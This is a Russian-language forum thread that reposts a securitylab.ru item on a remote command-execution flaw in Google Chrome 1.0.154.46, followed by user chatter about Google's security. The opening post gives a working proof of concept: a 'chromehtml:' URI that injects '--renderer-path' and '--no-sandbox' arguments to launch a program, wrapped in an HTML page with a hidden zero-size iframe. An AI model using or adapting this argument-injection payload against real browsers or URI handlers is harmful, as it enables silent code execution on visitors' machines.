Google Chrome 1.0.154.46 (ChromeHTML://)

[Одинокий Волк]

Google Chrome – браузер с открытым исходным кодом от компании Google, опять лицом в грязь. На этот раз очередное выполнение произвольного кода из-за недостаточной фильтрации параметра "chromehtml:"
Эксплойт был проверен на XP/Vista, IE6/7.

Код эксплойта:
[New$paN]

Try this:

chromehtml:"%20--renderer-path="calc"%20--no-sandbox

Disabling sandbox does matter
Tested with Google Chrome Chrome 1.0.154.46 on Win XP/Vista and IE6/IE7 and it works ...

Full PoC:

<html><head><title>Chrome URI Handler Remote Command Execution PoC</title></head>
<body>
<h3>This is a test</h3>
<iframe src='chromehtml:"%20--renderer-path="calc"%20--no-sandbox' width=0 height=0></iframe>
</body></html>

© По материалам www.securitylab.ru

 

[SiriX]

Эхххх. Всё таки замечательно что я его так и не скачал
Не получается у Гугла нормальный софт написать, намучаются они в будущем <_<

 

[GZip]

чего и следовало ожидать

 

[pifko12]

думаю гоогле еще покажет себя, денег у них хватает так что остальное не проблема

 

[Одинокий Волк]

Я вот вчера писал это, а щас зашёл и ах*ул от написанного.
Даже сам не обратил внимание раньше.... смотрим внимательно что написано:

Tested with Google Chrome Chrome 1.0.154.46 on Win XP/Vista and IE6/IE7 and it works ...

И я дурак ещё взял эту строчку по русски написал выше.
Какой IE?????????? Браузер то chrome :blink:

 

[WeKSTiK]

:lol2: мда, прикольно, сразу и не заметишь)))

 

[jet92]

Херово, выходит напрасно я хром использую. Честно говоря думал что раз он такой мало-популярный то вполне безопасен.